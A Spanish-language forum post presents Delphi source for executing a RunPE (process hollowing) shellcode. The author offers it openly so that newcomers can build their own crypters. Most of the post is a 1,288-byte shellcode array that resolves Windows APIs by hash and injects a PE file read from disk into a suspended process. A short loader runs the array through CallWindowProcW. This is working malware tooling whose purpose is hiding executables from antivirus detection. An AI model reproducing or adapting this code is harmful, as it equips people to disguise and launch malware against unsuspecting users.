pregunte a varios compañeros del foro como hacerlo andar hasta que el compadre de joselin me puso lo pies en la tierra y compartio codigo, ahi entendi que cuando estaba llamando al segundo parametro de la funcion que es donde va la ruta del ejecutable lo hacia como si fuera un string ascii y no como unicode esta tonteria me volvia loco pero cuando uno es nuevo y no sabe como funciona algo cuesta.
Asi que si mas que decir les traigo como utilizar un shellcode en Delphi porque aunque existe varios codigos publicados pocos habla de como usarlos principalmente en Delphi, agradezco tambien a pink por que ha publicado varios shellcode y en uno de ellos venia su funcionamiento por el cual tambien me base de ahi, esto es para que si algun chico nuevo quiere hacer su crypter usando shellcode lo tenga mas facil.
uses
SysUtils,windows;
//shellcode del runPE uso y parametros: runPE(path:pwidechar; bufferExe:pointer):cardinal;
Const
Shell: Array [0 .. 1287] Of Byte = ($60, $E8, $4E, $00, $00, $00, $6B, $00, $65, $00, $72, $00, $6E, $00, $65, $00, $6C, $00, $33, $00, $32, $00, $00, $00, $6E, $00, $74, $00, $64, $00, $6C, $00,
$6C, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $5B, $8B, $FC, $6A, $42, $E8, $BB, $03, $00, $00, $8B, $54, $24, $28, $89, $11, $8B, $54, $24, $2C, $6A, $3E, $E8, $AA, $03, $00,
$00, $89, $11, $6A, $4A, $E8, $A1, $03, $00, $00, $89, $39, $6A, $1E, $6A, $3C, $E8, $9D, $03, $00, $00, $6A, $22, $68, $F4, $00, $00, $00, $E8, $91, $03, $00, $00, $6A, $26, $6A, $24, $E8, $88,
$03, $00, $00, $6A, $2A, $6A, $40, $E8, $7F, $03, $00, $00, $6A, $2E, $6A, $0C, $E8, $76, $03, $00, $00, $6A, $32, $68, $C8, $00, $00, $00, $E8, $6A, $03, $00, $00, $6A, $2A, $E8, $5C, $03, $00,
$00, $8B, $09, $C7, $01, $44, $00, $00, $00, $6A, $12, $E8, $4D, $03, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $79, $03, $00, $00, $6A, $3E, $E8, $3B, $03, $00, $00, $8B, $D1, $6A, $1E, $E8,
$32, $03, $00, $00, $6A, $40, $FF, $32, $FF, $31, $FF, $D0, $6A, $12, $E8, $23, $03, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $4F, $03, $00, $00, $6A, $1E, $E8, $11, $03, $00, $00, $8B, $09,
$8B, $51, $3C, $6A, $3E, $E8, $05, $03, $00, $00, $8B, $39, $03, $FA, $6A, $22, $E8, $FA, $02, $00, $00, $8B, $09, $68, $F8, $00, $00, $00, $57, $51, $FF, $D0, $6A, $00, $E8, $E8, $02, $00, $00,
$68, $88, $FE, $B3, $16, $51, $E8, $14, $03, $00, $00, $6A, $2E, $E8, $D6, $02, $00, $00, $8B, $39, $6A, $2A, $E8, $CD, $02, $00, $00, $8B, $11, $6A, $42, $E8, $C4, $02, $00, $00, $57, $52, $6A,
$00, $6A, $00, $6A, $04, $6A, $00, $6A, $00, $6A, $00, $6A, $00, $FF, $31, $FF, $D0, $6A, $12, $E8, $A9, $02, $00, $00, $68, $D0, $37, $10, $F2, $51, $E8, $D5, $02, $00, $00, $6A, $22, $E8, $97,
$02, $00, $00, $8B, $11, $6A, $2E, $E8, $8E, $02, $00, $00, $8B, $09, $FF, $72, $34, $FF, $31, $FF, $D0, $6A, $00, $E8, $7E, $02, $00, $00, $68, $9C, $95, $1A, $6E, $51, $E8, $AA, $02, $00, $00,
$6A, $22, $E8, $6C, $02, $00, $00, $8B, $11, $8B, $39, $6A, $2E, $E8, $61, $02, $00, $00, $8B, $09, $6A, $40, $68, $00, $30, $00, $00, $FF, $72, $50, $FF, $77, $34, $FF, $31, $FF, $D0, $6A, $36,
$E8, $47, $02, $00, $00, $8B, $D1, $6A, $22, $E8, $3E, $02, $00, $00, $8B, $39, $6A, $3E, $E8, $35, $02, $00, $00, $8B, $31, $6A, $22, $E8, $2C, $02, $00, $00, $8B, $01, $6A, $2E, $E8, $23, $02,
$00, $00, $8B, $09, $52, $FF, $77, $54, $56, $FF, $70, $34, $FF, $31, $6A, $00, $E8, $10, $02, $00, $00, $68, $A1, $6A, $3D, $D8, $51, $E8, $3C, $02, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $12,
$E8, $F9, $01, $00, $00, $68, $5B, $E8, $14, $CF, $51, $E8, $25, $02, $00, $00, $6A, $22, $E8, $E7, $01, $00, $00, $8B, $11, $83, $C2, $06, $6A, $3A, $E8, $DB, $01, $00, $00, $6A, $02, $52, $51,
$FF, $D0, $6A, $36, $E8, $CE, $01, $00, $00, $C7, $01, $00, $00, $00, $00, $B8, $28, $00, $00, $00, $6A, $36, $E8, $BC, $01, $00, $00, $F7, $21, $6A, $1E, $E8, $B3, $01, $00, $00, $8B, $11, $8B,
$52, $3C, $81, $C2, $F8, $00, $00, $00, $03, $D0, $6A, $3E, $E8, $9F, $01, $00, $00, $03, $11, $6A, $26, $E8, $96, $01, $00, $00, $6A, $28, $52, $FF, $31, $6A, $12, $E8, $8A, $01, $00, $00, $68,
$5B, $E8, $14, $CF, $51, $E8, $B6, $01, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $26, $E8, $73, $01, $00, $00, $8B, $39, $8B, $09, $8B, $71, $14, $6A, $3E, $E8, $65, $01, $00, $00, $03, $31, $6A,
$26, $E8, $5C, $01, $00, $00, $8B, $09, $8B, $51, $0C, $6A, $22, $E8, $50, $01, $00, $00, $8B, $09, $03, $51, $34, $6A, $46, $E8, $44, $01, $00, $00, $8B, $C1, $6A, $2E, $E8, $3B, $01, $00, $00,
$8B, $09, $50, $FF, $77, $10, $56, $52, $FF, $31, $6A, $00, $E8, $2A, $01, $00, $00, $68, $A1, $6A, $3D, $D8, $51, $E8, $56, $01, $00, $00, $83, $C4, $0C, $FF, $D0, $6A, $36, $E8, $13, $01, $00,
$00, $8B, $11, $83, $C2, $01, $89, $11, $6A, $3A, $E8, $05, $01, $00, $00, $8B, $09, $3B, $CA, $0F, $85, $33, $FF, $FF, $FF, $6A, $32, $E8, $F4, $00, $00, $00, $8B, $09, $C7, $01, $07, $00, $01,
$00, $6A, $00, $E8, $E5, $00, $00, $00, $68, $D2, $C7, $A7, $68, $51, $E8, $11, $01, $00, $00, $6A, $32, $E8, $D3, $00, $00, $00, $8B, $11, $6A, $2E, $E8, $CA, $00, $00, $00, $8B, $09, $52, $FF,
$71, $04, $FF, $D0, $6A, $22, $E8, $BB, $00, $00, $00, $8B, $39, $83, $C7, $34, $6A, $32, $E8, $AF, $00, $00, $00, $8B, $31, $8B, $B6, $A4, $00, $00, $00, $83, $C6, $08, $6A, $2E, $E8, $9D, $00,
$00, $00, $8B, $11, $6A, $46, $E8, $94, $00, $00, $00, $51, $6A, $04, $57, $56, $FF, $32, $6A, $00, $E8, $86, $00, $00, $00, $68, $A1, $6A, $3D, $D8, $51, $E8, $B2, $00, $00, $00, $83, $C4, $0C,
$FF, $D0, $6A, $22, $E8, $6F, $00, $00, $00, $8B, $09, $8B, $51, $28, $03, $51, $34, $6A, $32, $E8, $60, $00, $00, $00, $8B, $09, $81, $C1, $B0, $00, $00, $00, $89, $11, $6A, $00, $E8, $4F, $00,
$00, $00, $68, $D3, $C7, $A7, $E8, $51, $E8, $7B, $00, $00, $00, $6A, $32, $E8, $3D, $00, $00, $00, $8B, $D1, $6A, $2E, $E8, $34, $00, $00, $00, $8B, $09, $FF, $32, $FF, $71, $04, $FF, $D0, $6A,
$00, $E8, $24, $00, $00, $00, $68, $88, $3F, $4A, $9E, $51, $E8, $50, $00, $00, $00, $6A, $2E, $E8, $12, $00, $00, $00, $8B, $09, $FF, $71, $04, $FF, $D0, $6A, $4A, $E8, $04, $00, $00, $00, $8B,
$21, $61, $C3, $8B, $CB, $03, $4C, $24, $04, $C3, $6A, $00, $E8, $F2, $FF, $FF, $FF, $68, $54, $CA, $AF, $91, $51, $E8, $1E, $00, $00, $00, $6A, $40, $68, $00, $10, $00, $00, $FF, $74, $24, $18,
$6A, $00, $FF, $D0, $FF, $74, $24, $14, $E8, $CF, $FF, $FF, $FF, $89, $01, $83, $C4, $10, $C3, $E8, $22, $00, $00, $00, $68, $A4, $4E, $0E, $EC, $50, $E8, $4B, $00, $00, $00, $83, $C4, $08, $FF,
$74, $24, $04, $FF, $D0, $FF, $74, $24, $08, $50, $E8, $38, $00, $00, $00, $83, $C4, $08, $C3, $55, $52, $51, $53, $56, $57, $33, $C0, $64, $8B, $70, $30, $8B, $76, $0C, $8B, $76, $1C, $8B, $6E,
$08, $8B, $7E, $20, $8B, $36, $38, $47, $18, $75, $F3, $80, $3F, $6B, $74, $07, $80, $3F, $4B, $74, $02, $EB, $E7, $8B, $C5, $5F, $5E, $5B, $59, $5A, $5D, $C3, $55, $52, $51, $53, $56, $57, $8B,
$6C, $24, $1C, $85, $ED, $74, $43, $8B, $45, $3C, $8B, $54, $28, $78, $03, $D5, $8B, $4A, $18, $8B, $5A, $20, $03, $DD, $E3, $30, $49, $8B, $34, $8B, $03, $F5, $33, $FF, $33, $C0, $FC, $AC, $84,
$C0, $74, $07, $C1, $CF, $0D, $03, $F8, $EB, $F4, $3B, $7C, $24, $20, $75, $E1, $8B, $5A, $24, $03, $DD, $66, $8B, $0C, $4B, $8B, $5A, $1C, $03, $DD, $8B, $04, $8B, $03, $C5, $5F, $5E, $5B, $59,
$5A, $5D, $C3, $C3, $00, $00, $00, $00);
//Funcion para leer un archivo binario y guardarlo dentro de una cadena
Function mFileToStr(Ruta: string): string;
var
sFile: HFile;
uBytes: Cardinal;
begin
sFile:= _lopen(PChar(Ruta), OF_READ);
uBytes:= GetFileSize(sFile, nil);
SetLength(Result, uBytes);
_lread(sfile, @result[1], uBytes);
_lclose(sFile);
end;
var
buffer:string;
szFilePath:array[1..1024]of widechar;
begin
buffer:=mFileToStr('C:\bcb6kg.EXE'); //Leemos el fichero que queremos usar
GetModuleFileNameW(0,@szFilePath[1],1024); //GetModuleFileNameW equivalente al paramstr(0) pero unicode
writeln(pwidechar(widestring(szFilePath))); //mostramos la direccion actual del proyecto principal
//el problema de llamado consistia en que el path tenia que ser unicode y yo lo manejaba como si fuera ascii
CallWindowProcW(@shell[0],hwnd(@szFilePath[1]),cardinal(@buffer[1]),0,0);//ejecutamos el shellcode
readln;
end.
